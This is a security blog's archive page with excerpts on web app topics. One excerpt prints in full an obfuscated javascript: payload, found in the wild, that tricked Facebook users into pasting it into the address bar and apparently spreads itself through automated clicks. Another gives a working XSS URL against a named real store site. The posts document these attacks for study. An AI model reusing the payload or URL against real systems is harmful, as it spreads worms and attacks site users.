Archive for category webapps
Yeoman Angular Bootstrap
Posted by scriptjunkie in webapps on March 28, 2016
Although I have done a lot of software development on different projects, I am not great at making nice looking UI’s. Someone recently told me it would be easy to set up a simple but nice looking webapp starting with a quick Yeoman Angular tutorial. What follows is my actual experience. Step 1: Get development […]
A Comparison of HTTPS Reforms
Posted by scriptjunkie in Defense, Uncategorized, webapps on December 11, 2013
An old adage in cryptology is that encrypting data is always easy, but key distribution is always hard. Just a few days ago, Google reported that yet another wrongfully-issued certificate had been found for Google’s domains. As a result of many incidents and problems with CA-issued certificates, many different proposals have been made to improve the system. Google’s Certificate Transparency page compares some of the proposals; but it did not include my favorite idea, I thought it did not do justice to some of the other competing proposals, and it glossed over some of CT’s big issues. I evaluated all the proposals according to these criteria and put together the below spreadsheet to compare their strengths and weaknesses.
Adding Easy SSL Client Authentication To Any Webapp
Posted by scriptjunkie in /dev/urandom, webapps on November 30, 2013
Let’s face it, if you are using passwords on your web site or application, you are part of the problem. It doesn’t matter if you’re using bcrypt or scrypt, or all the salt in the world, you’re still perpetuating these 11 password problems and pains. But client certificate authentication and even issuance is actually easy with modern browsers. Want to see how easy it can be? Check out the example below.
The Hacker Games
Posted by scriptjunkie in Exploits, webapps on April 4, 2012
Welcome, welcome! The time has come to select one courageous young hacker for the honor of representing District 12 in the 74th annual Hacker Games! And congratulations, for you have been selected as tribute! … Depending on your skill level, you could pwn (or be pwned) in just a few minutes or in a few hours. So hack it before it hacks you …
Original Source Forgery
Posted by scriptjunkie in /dev/urandom, webapps on September 8, 2011
If you were looking for vulnerabilities on a website, you might open up the original page source looking for commented-out code, javascript source, hidden forms, etc. If you suspected an XSS attack on your own site, chances are you might right-click on the page and view source to check for unwanted scripts. If you needed to register for CTP, hack this site, or read the snarky comments in the HTML of www.defcon.org, you would probably need to view the page source.
This is all based on your assumption that when you right-click on the page and select “View Source” the text you see is the HTML source that the server sent to your browser when it requested the URL in your address bar. Unfortunately if you assumed this, you would be wrong […]
Facebook social engineering XSS
Posted by scriptjunkie in webapps on May 11, 2010
Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript: javascript:(function(){a=’app121760014508794_iji’;b=’app121760014508794_aja’;rew=’app121760014508794_rew’;qwe=’app121760014508794_qwe’;qtt=’app121760014508794_qtt’;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘P e=[“\p\g\l\g\I\g\k\g\h\D”,”\l\h\D\k\f”,”\o\f\h\v\k\f\q\f\j\h\J\D\Q\x”,”\y\g\x\x\f\j”,”\g\j\j\f\z\R\K\L\S”,”\p\n\k\A\f”,”\l\A\o\o\f\l\h”,”\k\g\G\f\q\f”,”\l\k\g\j\G”,”\L\r\A\l\f\v\p\f\j\h\l”,”\t\z\f\n\h\f\v\p\f\j\h”,”\t\k\g\t\G”,”\g\j\g\h\v\p\f\j\h”,”\x\g\l\u\n\h\t\y\v\p\f\j\h”,”\l\f\k\f\t\h\w\n\k\k”,”\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q”,”\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u”,”\l\A\I\q\g\h\X\g\n\k\r\o”,”\g\j\u\A\h”,”\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f”,”\Z\y\n\z\f”,”\u\r\u\w\t\r\j\h\f\j\h”];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);’,62,85,’||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000′.split(‘|’),0,{}))})(); ______________________________________ Looks like the “Dean Edwards packing tool” And according to http://www.strictly-software.com/unpacker here is the unpacked […]
XSS, no really
Posted by scriptjunkie in /dev/urandom, Exploits, webapps on April 15, 2010
XSS tends to get the eyeroll treatment from security pros since a) it’s everywhere. 2 min of looking for an example on the GOP website, and tada: http://www.gopstore.com/cgi-bin/rnc/scan/st=db/co=yes/sf=prod_group/se=stick%3Cimg%20src=0%20onerror=%22alert%281%29%22%20%3Eer/op=eq/tf=description/ml=12/sp=1stickers.html b) your 8-year-old kid can find it after about 2 minutes of instruction c) it doesn’t give you a shell (directly) But it still works. And it […]